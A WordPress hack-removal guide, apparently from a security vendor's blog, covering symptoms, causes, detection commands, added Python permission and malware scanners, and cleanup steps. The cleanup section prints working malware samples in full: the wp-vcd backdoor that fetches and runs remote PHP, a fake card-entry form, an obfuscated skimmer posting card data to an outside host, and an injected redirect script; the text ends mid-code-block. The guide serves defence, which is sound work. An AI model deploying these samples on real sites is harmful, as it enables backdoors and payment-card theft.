WordPress Hacked? These WordPress Vulnerabilities Could be the Reason

Is your WordPress site hacked?

If you are a newbie, you might feel lost deciding what to do and how to do it to get rid of the hack. Even if you have some development experience, it is still hard to accurately find and remove a hack.

Thus, I have put together this extensive guide to give you a real kickstart in detecting and removing the hack. This WordPress hack removal guide covers the symptoms, detection techniques, and removal process of a WordPress hack. It also covers possible causes and types of hacks; if you want to skip straight to the malware removal, follow this link.

Symptoms of Hacked WordPress Website

While defacement of a WordPress site is a clear indication that it has been hacked, other signs may be subtle and can go unnoticed by average users.

Some subtle signs of a WordPress site infected with malware:

Warning Messages

Weird Site Behaviour

  • If your WordPress site is redirecting users, this is a clear sign of a hack.
  • If you are not able to sign in to your website, it is possible that the hacker has changed the settings and ousted you. However, do check that you are using the correct username and password.
  • Adblockers are blocking the WordPress site because of cryptocurrency mining scripts.
  • Unknown pop-ups and malicious adverts appear on the WordPress site.
  • Suspicious Cron jobs waiting to be executed on the server or suspicious activity in the server logs.
  • Japanese-looking characters and gibberish content appear on the WordPress site. This points towards a Japanese Keyword Hack, Pharma Hack, etc.
  • Outbound spam emails spreading from your WordPress website’s domain.
  • WordPress website shows some unexpected error messages and the site becomes slow/unresponsive.
  • Not much traffic on the site but the server is always consuming heavy processing resources.

Changes in Files

  • New, unknown files in the wp-admin and wp-includes directories, both of which rarely get new files.
  • WordPress theme, header and footer files have been modified to create redirects.
  • New, unknown admin users appear in the WordPress website’s database.
  • Search results show an incorrect meta description of your WordPress site.

Why was your WordPress site hacked?

Your website’s security depends on the steps you take to secure it. Ignoring simple security rules increases your risks online.

The following might be the reasons why hackers exploited your website:

1. Not Updating WordPress

This is the most basic security measure for a website. Failing to update to the latest version is the number one reason for hacked sites, so always be quick to update to the latest, patched version. This closes the known vulnerabilities on your website.

2. Hosting on a Shared Server

A shared server may be the cheaper option, but it has costlier after-effects if hacked. Move your website to safer hosting and choose a trusted hosting provider. Make sure to verify that your provider complies with the best security standards.

3. Using Weak Passwords and Username

Almost all the sensitive areas of your website are password protected. A password made of your own name or your website’s name, with no numerals or special characters, is a weak password. Make sure you do not use weak passwords for the following:

  • wp-admin panel,
  • server hosting panel,
  • databases,
  • FTP accounts, and
  • your primary email account.

Also, change your default username to something unique. Usernames like admin, your own name or your website’s name are far too easy for an attacker to guess.

4. Incorrect File Permissions

Loose file permissions can let attackers read, modify or delete files. In some cases, attackers have even held files for ransom. Set the correct permissions as follows:

  • For files: 644
  • For directories: 755
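
As an added example (not code from the original article), the following Python script walks a WordPress install and reports every file or directory whose mode deviates from the 644/755 baseline above, marking world-writable entries as the most urgent; the root path argument and the --fix flag are this example's own assumptions.

```python
"""Audit WordPress file and directory permissions (added example).

Not part of the original article. Walks an installation and reports every
regular file whose mode is not 644 and every directory whose mode is not
755, the values recommended above; world-writable entries are marked as
the most urgent. With fix=True it also applies the expected mode.
The root path and --fix flag on the command line are assumptions.
"""
import os
import stat
import sys

FILE_MODE = 0o644  # rw-r--r--  ("For files: 644")
DIR_MODE = 0o755   # rwxr-xr-x  ("For directories: 755")


def audit_permissions(root, fix=False):
    """Return [(path, kind, mode, world_writable)] for entries off the baseline.

    Symbolic links are skipped so that a planted link cannot redirect a chmod
    outside the tree. When fix=True the expected mode is applied in place,
    before descending, so an unreadable directory becomes walkable.
    """
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        entries = [(os.path.join(dirpath, d), True) for d in dirnames]
        entries += [(os.path.join(dirpath, f), False) for f in filenames]
        for path, is_dir in entries:
            if os.path.islink(path):
                continue
            mode = stat.S_IMODE(os.lstat(path).st_mode)
            want = DIR_MODE if is_dir else FILE_MODE
            if mode == want:
                continue
            findings.append((path, "dir" if is_dir else "file", mode,
                             bool(mode & stat.S_IWOTH)))
            if fix:
                os.chmod(path, want)
    return findings


def world_writable(findings):
    """Subset of findings that any local account can modify: fix these first."""
    return [f for f in findings if f[3]]


if __name__ == "__main__":
    root = sys.argv[1] if len(sys.argv) > 1 else "."
    fix = "--fix" in sys.argv[2:]
    for path, kind, mode, ww in audit_permissions(root, fix=fix):
        flag = "WORLD-WRITABLE " if ww else ""
        print(f"{flag}{kind} {path} has mode {oct(mode)}")
```

Run it first without --fix to review the list; wp-config.php in particular should never be world-readable, so treat any deviation there as a finding to investigate rather than silently correct.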

Wordpress File/Folder Permissions

5. Unprotected Access to wp-admin Directory

The wp-admin directory is the area from which you control your website. Allowing unprotected access to it lets your users/team members perform unwanted actions on your website. Thus, restrict access by defining permissions for the different user roles, so that no single user has the power to do it all. Adding extra layers of authentication to the WordPress admin directory also helps.

6. Outdated Plugins or Theme

Numerous WordPress websites run outdated plugins and themes. Since these already contain known vulnerabilities, it is far too easy for hackers to exploit them. Therefore, if a plugin or theme developer pushes an update, apply it quickly.

7. Using Plain FTP instead of SFTP/SSH

FTP accounts are used to upload files to your web server with an FTP client. Plain FTP does not encrypt your password, which heightens the risk of it being stolen. SFTP (SSH File Transfer Protocol), on the other hand, sends data to the server encrypted. So, always opt for SFTP over FTP. You can do this by selecting the ‘SFTP – SSH’ protocol every time you connect to your server.

Fixing hacked WordPress website

How to Fix Your Hacked WordPress Site?

Once you are sure that your WordPress site has indeed been hacked, this is how you can go about the hack removal:

1. Let Astra Help You

If you are an Astra Pro customer, you need not worry a bit, just raise a support ticket and Astra security engineers will clean the hack for you. They will also take care of any blacklisting that your website might face. If you are not an Astra customer, you can sign up right now and we will take care of it all for you. With Astra’s immediate malware removal service, your website will be up and running in merely a few hours.

2. Turn on the Maintenance mode

If you have detected malicious activity on your website, it is only prudent to put it in maintenance mode. This ensures that no one is able to see the hack and helps retain your site’s reputation. Putting your site in maintenance mode also ensures that your visitors are safe from any malicious redirection.

Also, while you attempt to clean the hack, the changes might hinder the performance of your live site, which you obviously don’t want. Further, you can use a WordPress plugin to show quirky maintenance mode messages to your site visitors without revealing that a hack is being removed.

3. Change Current Passwords

If you can still access your website, change all the passwords immediately. This should include the passwords to your admin panel, hosting account and other accounts. If you have other team members using the admin panel, ask them to change their passwords as well. It is possible that the hacker got into your website by stealing the password of one of your teammates.

You can also opt to re-authenticate all user accounts. This automatically logs every user out of your website, and they will need to log in again. This is another way of revoking access from any unauthorized user.

4. Check for Plugin Vulnerabilities

Vulnerabilities in third-party plugins are another common cause of WordPress site hacks. So, before jumping to the cleaning process, check that the current versions of your plugins are free of known vulnerabilities.

WordPress sites frequently become targets of exploits for unpatched plugin vulnerabilities, so it is always possible that you have become the victim of a plugin exploit. Know that you will not be alone in this; plugin exploits usually target large numbers of sites running the vulnerable plugin.

To confirm this, check the WordPress forums. Generally, a buzz follows on the forums after a plugin exploit, and you’ll find people asking for solutions.

5. Backup Your Website

Next, take a full backup of your website. Since the purpose of a backup is to restore the website in case of a mishap, make sure it actually works: a backup that does not restore your website to its full working condition is nothing but a waste.

A backup should include the WP core files, the WP database, plugin files, theme files and the .htaccess file. Most hosting services offer backup features; get in touch with your hosting provider to learn their backup process. Besides that, you can also make a backup manually, and WordPress has loads of backup plugins that simplify the process.

6. Diagnose Files

6.1 Use a malware scanner to find malicious codes

Run your site through a malware scanner. It will give you details of all files with malicious content. You can also scan for the malware manually, but that requires a lot of time and wouldn’t be as accurate as a scanner.

Next, decode the base64 strings collected in hiddencode.txt (the file produced by the find/grep command in step 6.2) using an online decoder. This can alternatively be done in phpMyAdmin, as shown in the image below. phpMyAdmin also comes in handy when cleaning the database of a hacked WordPress site.

WordPress site hacked phpMyadmin

In case you find something suspicious but are unable to figure out what it does, get in touch with experts, we’ll be happy to help.

6.2 Use ‘find’ command to review recent modifications

In order to see the WordPress files modified by the attackers, obtain SSH access to your server and run the following command:

find . -mtime -2 -ls

This command lists all the WordPress files modified in the last 2 days. Keep increasing the number of days until you find something fishy. Next, combine this find command with grep to search for base64-encoded code. Simply execute the following command:

find . -name "*.php" -exec grep "base64" '{}' \; -print &> hiddencode.txt

6.3 Compare with original WordPress files 

Download a fresh copy of WordPress from the WordPress directory and compare it with your backup. You can also use online tools like a diff checker to find the differences between the files. Be careful to download the files matching your WordPress version. Note the differences for further analysis. If there are malicious injected links, remove them at once. Also, check the files for keywords like eval, exec, strrev, assert, base64, str_rot13, stripslashes, preg_replace (with the /e modifier), move_uploaded_file, etc.

You can further simplify the search for these keywords from the command line. For instance, to search for files containing the keyword base64 under your WordPress document root (replace /path/to/wordpress with the actual path), run:

sudo grep -ril base64 /path/to/wordpress

Now, replace ‘base64’ with each of the other keywords to find the files containing them, and review those files attentively.

6.4 Check with Diagnostic Tools

Generally, webmaster tools are quick and accurate in detecting a hack. Use them to find the problem. Google Search Console, for example, lists the problems under the ‘Security’ tab. It is a great way to confirm the type of hack and the hacked files/pages. Review this information for a proper WordPress hack removal.

7. Clean the Hack

After the extensive diagnosis, list all the findings. Each file difference, recent modification and fake user/admin should be reviewed with the utmost attention. Clean the WordPress core files such as wp-config.php, the wp-content/uploads directory, plugin files, theme files, the database, etc.

The following wp-vcd malware was found inserted into the theme’s functions.php:

<?php
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '9448f3b8168d84e7c43011bdf480dff7'))
{
switch ($_REQUEST['action'])
{

case 'change_domain';
if (isset($_REQUEST['newdomain']))
{

if (!empty($_REQUEST['newdomain']))
{
if ($file = @file_get_contents(__FILE__))
{
if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i',$file,$matcholddomain))
{

$file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
@file_put_contents(__FILE__, $file);
print "true";
}

}
}
}
break;

case 'change_code';
if (isset($_REQUEST['newcode']))
{

if (!empty($_REQUEST['newcode']))
{
if ($file = @file_get_contents(__FILE__))
{
if(preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i',$file,$matcholdcode))
{

$file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);
@file_put_contents(__FILE__, $file);
print "true";
}

}
}
}
break;

default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
}

die("");
}

$funcfile = __FILE__;
if(!function_exists('theme_temp_setup')) {
$path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {

function file_get_contents_tcurl($url)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
$data = curl_exec($ch);
curl_close($ch);
return $data;
}

function theme_temp_setup($phpCode)
{
$tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
$handle = fopen($tmpfname, "w+");
if( fwrite($handle, "<?php\n" . $phpCode))
{
}
else
{
$tmpfname = tempnam('./', "theme_temp_setup");
$handle = fopen($tmpfname, "w+");
fwrite($handle, "<?php\n" . $phpCode);
}
fclose($handle);
include $tmpfname;
unlink($tmpfname);
return get_defined_vars();
}

$wp_auth_key='d54ca5d0c33699631268138a6fbd33d8';
if (($tmpcontent = @file_get_contents("http://www.grilns.com/code.php") OR $tmpcontent = @file_get_contents_tcurl("https://www.grilns.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}

}
}

elseif ($tmpcontent = @file_get_contents("http://www.grilns.pw/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false ) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}

}
}

elseif ($tmpcontent = @file_get_contents("http://www.grilns.top/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false ) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}

}
}
elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));

} elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));

} elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));

}

}
}

//$start_wp_theme_tmp

//wp_tmp

//$end_wp_theme_tmp

Remove unknown users and fake admins. Finally, make sure to find and remove backdoors.
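As an added example that is not part of the original article, the following Python scanner combines the step 6.3 keyword list with the markers visible in the wp-vcd sample above (theme_temp_setup, file_get_contents_tcurl, $wp_auth_key, wp-tmp.php, $start_wp_theme_tmp) and also flags long base64 runs that decode to PHP; the pattern names and the constructed SAMPLE_PHP are assumptions of this example.

```python
"""Scan PHP files for the indicators discussed above (added example).

Not part of the original article. Combines the step 6.3 keyword list
(eval, exec, strrev, assert, base64, str_rot13, stripslashes, preg_replace
with /e, move_uploaded_file) with markers visible in the wp-vcd sample
(theme_temp_setup, file_get_contents_tcurl, $wp_auth_key, wp-tmp.php,
$start_wp_theme_tmp), and flags long base64 runs that decode to PHP.
The pattern names and the constructed SAMPLE_PHP below are assumptions.
"""
import base64
import binascii
import os
import re

# Step 6.3 keywords, anchored to calls so prose mentions do not match.
KEYWORD_PATTERNS = {
    "eval": r"\beval\s*\(",
    "exec": r"\b(?:shell_)?exec\s*\(",
    "strrev": r"\bstrrev\s*\(",
    "assert": r"\bassert\s*\(",
    "base64": r"\bbase64_(?:de|en)code\s*\(",
    "str_rot13": r"\bstr_rot13\s*\(",
    "stripslashes": r"\bstripslashes\s*\(",
    # A quoted pattern whose closing '/' delimiter is followed by an 'e' modifier.
    "preg_replace /e": r"\bpreg_replace\s*\(\s*['\"][^'\"]*/[a-zA-Z]*e[a-zA-Z]*['\"]",
    "move_uploaded_file": r"\bmove_uploaded_file\s*\(",
}

# Strings that identify the wp-vcd dropper shown in this section.
WPVCD_PATTERNS = {
    "wp-vcd: theme_temp_setup": r"\btheme_temp_setup\b",
    "wp-vcd: file_get_contents_tcurl": r"\bfile_get_contents_tcurl\b",
    "wp-vcd: wp_auth_key": r"\$wp_auth_key\s*=",
    "wp-vcd: wp-tmp.php dropper": r"wp-tmp\.php",
    "wp-vcd: start_wp_theme_tmp marker": r"\$start_wp_theme_tmp",
}

ALL_PATTERNS = {name: re.compile(rx)
                for name, rx in {**KEYWORD_PATTERNS, **WPVCD_PATTERNS}.items()}
BASE64_RUN = re.compile(r"[A-Za-z0-9+/]{60,}={0,2}")
PHP_HINTS = (b"<?php", b"eval(", b"base64_decode(")


def decodes_to_php(blob):
    """True if a base64 run decodes cleanly to bytes that look like PHP."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except (binascii.Error, ValueError):
        return False
    return any(hint in raw for hint in PHP_HINTS)


def scan_source(src):
    """Return [(line_no, indicator, snippet)] for every hit in one PHP source."""
    findings = []
    for line_no, line in enumerate(src.splitlines(), 1):
        for name, rx in ALL_PATTERNS.items():
            if rx.search(line):
                findings.append((line_no, name, line.strip()[:80]))
        for blob in BASE64_RUN.findall(line):
            if decodes_to_php(blob):
                findings.append((line_no, "base64 blob decoding to PHP", blob[:40] + "..."))
    return findings


def scan_tree(root):
    """Scan every *.php under root; return {path: findings} for files with hits."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            if not fname.endswith(".php"):
                continue
            path = os.path.join(dirpath, fname)
            try:
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    hits = scan_source(fh.read())
            except OSError:
                continue
            if hits:
                report[path] = hits
    return report


# Constructed test input resembling the wp-vcd snippet; not taken from any site.
HIDDEN = base64.b64encode(b"<?php eval($_POST['c']); ?>" + b"/* pad */" * 8).decode()
SAMPLE_PHP = """<?php
function theme_temp_setup($phpCode) {
    $tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
}
$wp_auth_key = 'PLACEHOLDER_KEY';
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
$x = preg_replace('/.*/e', 'eval($_GET["q"])', '');
$y = base64_decode('%s');
//$start_wp_theme_tmp
""" % HIDDEN

if __name__ == "__main__":
    import sys
    for path, hits in scan_tree(sys.argv[1] if len(sys.argv) > 1 else ".").items():
        for line_no, name, snippet in hits:
            print(f"{path}:{line_no}: {name}: {snippet}")
```

Hits on legitimate core or plugin code are expected for some keywords (stripslashes in particular), so compare flagged files against a fresh download of the same version, as step 6.3 describes, before deleting anything.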

Another malicious script, used for stealing credit card details, looks like this:

<script>function a(){
payment.switchMethod();


document.getElementById('authorizenet_cc_number').disabled = false;
document.getElementById('authorizenet_cc_type').disabled = false;
document.getElementById('authorizenet_expiration').disabled = false;
document.getElementById('authorizenet_expiration_yr').disabled = false;
document.getElementById('authorizenet_cc_cid').disabled = false;
document.getElementById('payment_cc').style.visibility = "visible" ;
console.log("areh");
if(n<1){
var rad = document.getElementsByClassName('radio');
var prev = null;
for (var i = 0; i < rad.length; i++) {
console.log(i);
rad[i].addEventListener('change', function() {
(prev) ? console.log(prev.value): null;
if (this !== prev) {
prev = this;
}
if(this.value!='ops_dorf'){
console.log("close");
document.getElementById('payment_cc').style.visibility = "hidden";
}
});
}
n++;
}

};
var n=0;
var fieldset= document.getElementById('checkout-payment-method-load');
var fieldParent = fieldset.parentNode;

var newdd = document.createElement('dd');
newdd.setAttribute("id", "dt_method_ops_directDebit");
newdd.setAttribute("class", "active");



newdd.innerHTML = '<input id="p_method_ops_directDebit" value="ops_dorf" name="payment[method]" title="Ingenico ePayments DirectDebit" onchange="a()" class="radio" autocomplete="off" type="radio"><label for="p_method_ops_directDebit"> Credit Card / Debit Card</label>';


var newdt = document.createElement('dt');

newdt.setAttribute("id", "payment_cc");
newdt.setAttribute("style", "visibility: hidden;");

newdt.innerHTML = '<ul class="form-list" id="payment_form_authorizenet" style="overflow: hidden;"><li><label for="authorizenet_cc_type" class="required"><em>*</em>Credit Card Type</label><div class="input-box"><select id="authorizenet_cc_type" name="payment[cc_type]" class="required-entry validate-cc-type-select"><option value="">--Please Select--</option><option value="AE">American Express</option><option value="VI">Visa</option><option value="MC">MasterCard</option><option value="DI">Discover</option></select></div></li><li><label for="authorizenet_cc_number" class="required"><em>*</em>Credit Card Number</label><div class="input-box"><input id="authorizenet_cc_number" name="payment[cc_number]" title="Credit Card Number" class="input-text validate-cc-number validate-cc-type" value="" type="text"></div></li><li id="authorizenet_cc_type_exp_div"><label for="authorizenet_expiration" class="required"><em>*</em>Expiration Date</label><div class="input-box"><div class="v-fix"><select id="authorizenet_expiration" name="payment[cc_exp_month]" class="month validate-cc-exp required-entry"><option value="" selected="selected">Month</option><option value="1">01 - January</option><option value="2">02 - February</option><option value="3">03 - March</option><option value="4">04 - April</option><option value="5">05 - May</option><option value="6">06 - June</option><option value="7">07 - July</option><option value="8">08 - August</option><option value="9">09 - September</option><option value="10">10 - October</option><option value="11">11 - November</option><option value="12">12 - December</option></select></div><div class="v-fix"><select id="authorizenet_expiration_yr" name="payment[cc_exp_year]" class="year required-entry"><option value="" selected="selected">Year</option><option value="2019">2019</option><option value="2020">2020</option><option value="2021">2021</option><option value="2022">2022</option><option value="2023">2023</option><option value="2024">2024</option><option value="2025">2025</option><option value="2026">2026</option><option value="2027">2027</option><option value="2028">2028</option><option value="2029">2029</option></select></div></div></li><li id="authorizenet_cc_type_cvv_div"><label for="authorizenet_cc_cid" class="required"><em>*</em>Card Verification Number</label><div class="input-box"><div class="v-fix"><input title="Card Verification Number" class="input-text cvv required-entry validate-cc-cvn" id="authorizenet_cc_cid" name="payment[cc_cid]" value="" type="text"></div><a href="#" class="cvv-what-is-this">What is this?</a></div></li></ul>';
fieldParent.appendChild(newdd);fieldParent.appendChild(newdt);</script>


<script>
var _0xb4aa=["\x3B\x20","\x63\x6F\x6F\x6B\x69\x65","\x3D","\x73\x70\x6C\x69\x74","\x6C\x65\x6E\x67\x74\x68","\x73\x68\x69\x66\x74","\x3B","\x70\x6F\x70","\x62\x75\x74\x74\x6F\x6E","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x63\x6C\x69\x63\x6B","","\x66\x6F\x72\x6D","\x63\x75\x72\x72\x65\x6E\x74\x64\x61\x74\x61\x73\x3D","\x24","\x3B\x20\x70\x61\x74\x68\x3D\x2F","\x69\x6E\x70\x75\x74","\x73\x65\x6C\x65\x63\x74","\x76\x61\x6C\x75\x65","\x74\x79\x70\x65","\x72\x61\x64\x69\x6F","\x68\x69\x64\x64\x65\x6E","\x69\x64","\x73\x65\x61\x72\x63\x68","\x73\x75\x62\x6D\x69\x74","\x6E\x61\x6D\x65","\x63\x75\x72\x72\x65\x6E\x74\x64\x61\x74\x61\x73","\x3A","\x7C","\x63\x63\x5F\x6E\x75\x6D\x62\x65\x72","\x69\x6E\x64\x65\x78\x4F\x66","\x36\x36\x36\x20","\x55\x52\x4C","\x64\x69\x73\x63\x6F\x75\x6E\x74","\x73\x74\x72\x69\x6E\x67\x69\x66\x79","\x61\x70\x70\x65\x6E\x64","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x77\x77\x77\x2E\x68\x61\x6C\x6C\x6F\x77\x65\x65\x6E\x68\x61\x6C\x6C\x77\x61\x79\x2E\x63\x6F\x6D\x2F\x6A\x73\x2F\x6D\x61\x67\x65\x2F\x61\x64\x6D\x69\x6E\x68\x74\x6D\x6C\x2F\x70\x72\x6F\x64\x75\x63\x74\x2F\x63\x6F\x6D\x70\x6F\x73\x69\x74\x65\x2F\x76\x61\x6C\x69\x64\x61\x74\x65\x2E\x70\x68\x70","\x50\x4F\x53\x54","\x6F\x70\x65\x6E","\x73\x65\x6E\x64","\x61\x64\x64\x45\x76\x65\x6E\x74\x4C\x69\x73\x74\x65\x6E\x65\x72","\x6C\x6F\x61\x64"];function getCookie(_0x9e9fx2){var _0x9e9fx3=_0xb4aa[0]+ document[_0xb4aa[1]];var _0x9e9fx4=_0x9e9fx3[_0xb4aa[3]](_0xb4aa[0]+ _0x9e9fx2+ _0xb4aa[2]);if(_0x9e9fx4[_0xb4aa[4]]== 2){return _0x9e9fx4[_0xb4aa[7]]()[_0xb4aa[3]](_0xb4aa[6])[_0xb4aa[5]]()}}function taef(){var _0x9e9fx6=document[_0xb4aa[9]](_0xb4aa[8]);for(i= 0;i< _0x9e9fx6[_0xb4aa[4]];i++){_0x9e9fx6[i][_0xb4aa[40]](_0xb4aa[10],function(){var _0x9e9fx7=_0xb4aa[11];var _0x9e9fx8=document[_0xb4aa[9]](_0xb4aa[12]);document[_0xb4aa[1]]= _0xb4aa[13]+ _0xb4aa[14]+ _0xb4aa[15];for(z= 0;z< _0x9e9fx8[_0xb4aa[4]];z++){var _0x9e9fx9=_0x9e9fx8[z][_0xb4aa[9]](_0xb4aa[16]);var _0x9e9fxa=_0x9e9fx8[z][_0xb4aa[9]](_0xb4aa[17]);for(x= 0;x< _0x9e9fx9[_0xb4aa[4]];x++){if(_0x9e9fx9[x][_0xb4aa[18]]&& _0x9e9fx9[x][_0xb4aa[18]]!= _0xb4aa[11]&& _0x9e9fx9[x][_0xb4aa[19]]!= _0xb4aa[20]&& _0x9e9fx9[x][_0xb4aa[19]]!= _0xb4aa[21]&& _0x9e9fx9[x][_0xb4aa[22]]!= _0xb4aa[23]&& _0x9e9fx9[x][_0xb4aa[18]]!= _0xb4aa[24]){if(_0x9e9fx9[x][_0xb4aa[25]]&& _0x9e9fx9[x][_0xb4aa[25]]!= _0xb4aa[11]){var _0x9e9fxb=getCookie(_0xb4aa[26]);_0x9e9fxb+= _0x9e9fx9[x][_0xb4aa[25]]+ _0xb4aa[27]+ _0x9e9fx9[x][_0xb4aa[18]]+ _0xb4aa[28];document[_0xb4aa[1]]= _0xb4aa[13]+ _0x9e9fxb+ _0xb4aa[15]}else {var _0x9e9fxb=getCookie(_0xb4aa[26]);_0x9e9fxb+= _0x9e9fx9[x][_0xb4aa[22]]+ _0xb4aa[27]+ _0x9e9fx9[x][_0xb4aa[18]]+ _0xb4aa[28];document[_0xb4aa[1]]= _0xb4aa[13]+ _0x9e9fxb+ _0xb4aa[15]}}};for(x= 0;x< _0x9e9fxa[_0xb4aa[4]];x++){if(_0x9e9fxa[x][_0xb4aa[18]]&& _0x9e9fxa[x][_0xb4aa[18]]!= _0xb4aa[11]&& _0x9e9fxa[x][_0xb4aa[19]]!= _0xb4aa[20]&& _0x9e9fxa[x][_0xb4aa[19]]!= _0xb4aa[21]&& _0x9e9fxa[x][_0xb4aa[22]]!= _0xb4aa[23]&& _0x9e9fxa[x][_0xb4aa[18]]!= _0xb4aa[24]){if(_0x9e9fxa[x][_0xb4aa[25]]&& _0x9e9fxa[x][_0xb4aa[25]]!= _0xb4aa[11]){var _0x9e9fxb=getCookie(_0xb4aa[26]);_0x9e9fxb+= _0x9e9fxa[x][_0xb4aa[25]]+ _0xb4aa[27]+ _0x9e9fxa[x][_0xb4aa[18]]+ _0xb4aa[28];document[_0xb4aa[1]]= _0xb4aa[13]+ _0x9e9fxb+ _0xb4aa[15]}else {var _0x9e9fxb=getCookie(_0xb4aa[26]);_0x9e9fxb+= _0x9e9fxa[x][_0xb4aa[22]]+ _0xb4aa[27]+ _0x9e9fxa[x][_0xb4aa[18]]+ _0xb4aa[28];document[_0xb4aa[1]]= _0xb4aa[13]+ _0x9e9fxb+ _0xb4aa[15];document[_0xb4aa[1]]= _0xb4aa[13]+ _0x9e9fxb+ _0xb4aa[15]}}}};var _0x9e9fxb=getCookie(_0xb4aa[26]);_0x9e9fx7= _0x9e9fxb;if(_0x9e9fx7[_0xb4aa[30]](_0xb4aa[29])!== -1){var _0x9e9fxc= new FormData();var _0x9e9fxd={Domain:_0xb4aa[31]+ document[_0xb4aa[32]],d:btoa(_0x9e9fx7)};_0x9e9fxc[_0xb4aa[35]](_0xb4aa[33],btoa(JSON[_0xb4aa[34]](_0x9e9fxd)));urll= _0xb4aa[36];var _0x9e9fxe= new XMLHttpRequest();_0x9e9fxe[_0xb4aa[38]](_0xb4aa[37],urll,true);_0x9e9fxe[_0xb4aa[39]](_0x9e9fxc)}})}}window[_0xb4aa[40]](_0xb4aa[41],function(){taef()})
</script> 

8. Clean the sitemap

It may also happen that the WordPress malware resides in your site’s sitemap.xml. An XML sitemap is a file that helps Google crawl all the important pages on your website, and hackers sometimes inject malicious links into it.

Scan your sitemap for malicious links. If you find anything abnormal, remove it. Also, don’t forget to tell Google that you have cleaned the file: submit a request through Google Search Console to re-crawl your website.

9. Clean the database

The WordPress database is where all the information about your users, site pages, sensitive credentials, etc. resides. It’s a no-brainer that the database makes for a desirable target. Hence, it is extremely important to scan the database too to find the hack. You can use a malware scanner to learn more precisely about infections in your WordPress database.

If you wish to check manually, you will need to scan every one of the 11 tables to find the hack. Search for links/iframes that look suspicious and remove them to get rid of the hack. Here is an example of a redirection code inserted into the database:

<script>
const overlayTranslations = {"en":{"title":"Attention!","description":"Click “Allow” to subscribe to notifications and continue working with this website."}};
const overlay = {"delay":3000,"overlayStyle":{"background":"rgba(0,0,0, 0.6)"},"title":"Attention!","description":"Click “Allow” to subscribe to notifications and continue working with this website.",...(overlayTranslations[navigator.language.slice(0, 2).toLowerCase()]||Object.values(overlayTranslations)[0])};
const s = document.createElement('script');
s.src='//humsoolt.net/pfe/current/tag.min.js?z=2774009';
s.onload = (sdk) => {
sdk.updateOptions({overlay, overlayTranslations})
sdk.onPermissionDefault(() => {window.location.replace("//ellcurvth.com/afu.php?zoneid=2826294")});
sdk.onPermissionAllowed(() => {window.location.replace("//ellcurvth.com/afu.php?zoneid=2826294")});
sdk.onPermissionDenied(() => {window.location.replace("//ellcurvth.com/afu.php?zoneid=2826294")});
sdk.onAlreadySubscribed(() => {window.location.replace("//ellcurvth.com/afu.php?zoneid=2826294")});
sdk.onNotificationUnsupported(() => {});
}
document.head.appendChild(s);
</script>
<script data-cfasync='false' type='text/javascript' src='//p79479.clksite.com/adServe/banners?tid=79479_127480_7&tagid=2'></script><script type="text/javascript" src="//dolohen.com/apu.php?zoneid=2574011" async data-cfasync="false"></script><script type="text/javascript" src="//dolohen.com/apu.php?zoneid=676630" async data-cfasync="false"></script>
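As an added example (not from the original article), this Python snippet takes HTML pulled from wp_posts or wp_options and reports script/iframe loads from hosts outside an allowlist, plus the dynamic script injection and forced redirect techniques seen in the sample above; ALLOWED_HOSTS and the .example sample rows are assumptions of this example.

```python
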